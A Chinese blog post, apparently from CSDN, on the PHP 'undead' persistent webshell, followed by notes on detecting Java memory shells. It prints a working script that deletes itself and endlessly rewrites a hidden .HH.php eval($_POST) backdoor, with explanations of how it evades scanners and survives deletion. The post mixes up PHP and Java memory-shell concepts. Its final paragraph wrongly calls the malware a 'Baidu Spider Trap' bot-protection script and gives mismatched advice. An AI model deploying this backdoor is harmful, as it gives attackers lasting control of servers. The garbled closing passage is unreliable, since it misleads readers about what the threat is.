关于PHP不死马的分析和总结

本文介绍PHP不死马的工作原理及实现方式,包括使用ignore_user_abort、set_time_limit等函数确保恶意代码持续运行,并通过file_put_contents不断生成后门文件,同时利用unlink避免文件落地被检测。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

PHP不死马是我们达到权限维持的目的。

不死马的原理:

由客户端发起的Web请求后,中间件的各个独立的组件如ListenerFilterServlet等组件会在请求过程中做监听、判断、过滤等操作,内存马就是利用请求过程在内存中修改已有的组件或动态注册一个新的组件,插入恶意的shellcode,达到持久化控制服务器的目的

PHP不死马:

<?php
ignore_user_abort(true);
set_time_limit(0);
@unlink(__FILE__);
$file = '.HH.php';
$code = '<?php @eval($_POST[\'c\']); ?>';
while (1){
    file_put_contents($file,$code);
    usleep(5000);
}
?>

set_time_limit()函数:设置允许脚本运行的时间,单位为秒(如果设置该运行时间,sleep()函数在执行程序时的持续时间将会被忽略掉)

ignore_user_abort()函数:函数设置与客户机断开是否会终止脚本的执行(如果设置为True,则忽略与用户的断开)

unlink(FILE)函数:删除文件(防止文件落地被检测工具查杀)

file_put_contents函数:将一个字符串写入该文件中

usleep函数:延迟执行当前脚本数微秒,即条件竞争

在访问PHP文件的话 会生成一个.HH.php文件,然后会把自身文件删除,然后就可以用菜刀连接.HH.php:

删除.HH.php文件的话他会不断生成 .HH.php

内存马的检测

内存马排查思路: 先判断是通过什么方法注入的内存马,可以先查看web日志是否有可疑的web访问日志,如果是filter或者listener类型就会有大量url请求路径相同参数不同的,或者页面不存在但是返回200的,查看是否有类似哥斯拉、冰蝎相同的url请求,哥斯拉和冰蝎的内存马注入流量特征与普通webshell的流量特征基本吻合。通过查找返回200的url路径对比web目录下是否真实存在文件,如不存在大概率为内存马。

如在web日志中并未发现异常,可以排查是否为中间件漏洞导致代码执行注入内存马,排查中间件的error.log日志查看是否有可疑的报错,根据注入时间和方法根据业务使用的组件排查是否可能存在java代码执行漏洞以及是否存在过webshell,排查框架漏洞,反序列化漏洞

"死马"通常是指 PHP 的一种恶意脚本,也称为 "Baidu Spider Trap" 或 "Bad Bots Protection",它会消耗大量服务器资源,阻止搜索引擎爬虫访问网站。以下是一些常见的方法来检测清除这种恶意代码: 1. **检查常见特征**:死马脚本通常包含特定关键词,如 `exit();`、`die()` 或 `flush();` 等。通过搜索这些代码片段,可以识别潜在的问题。 2. **日志分析**:检查服务器日志,特别是在 `/var/log/apache2/error.log` 或 `/var/log/nginx/access.log` 这样的位置,看看是否有大量的无效请求或异常行为。 3. **使用安全插件**:一些安全插件如 Wordfence、iThemes Security 可以帮助检测并防止此类恶意攻击,它们内置了对死马陷阱的防护功能。 4. **扫描工具**:使用像 ModSecurity 或 WAF (Web Application Firewall) 的安全模块,它们可以实时监控并拦截可疑请求。 5. **更新补丁**:确保所有使用的 PHP 关联库都保持最新,因为新版本通常修复了已知的安全漏洞,这可能导致死马利用的漏洞。 6. **清理代码**:如果已经发现恶意代码,删除或注释掉相关的部分,并检查其他地方是否还有类似痕迹。 7. **禁止 IP**:将频繁尝试访问的 IP 地址添加到 `.htaccess` 或防火墙规则中,限制其访问。 8. **强化白名单**:只允许指定的搜索引擎爬虫访问,通过设置 robots.txt 文件明确告知。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值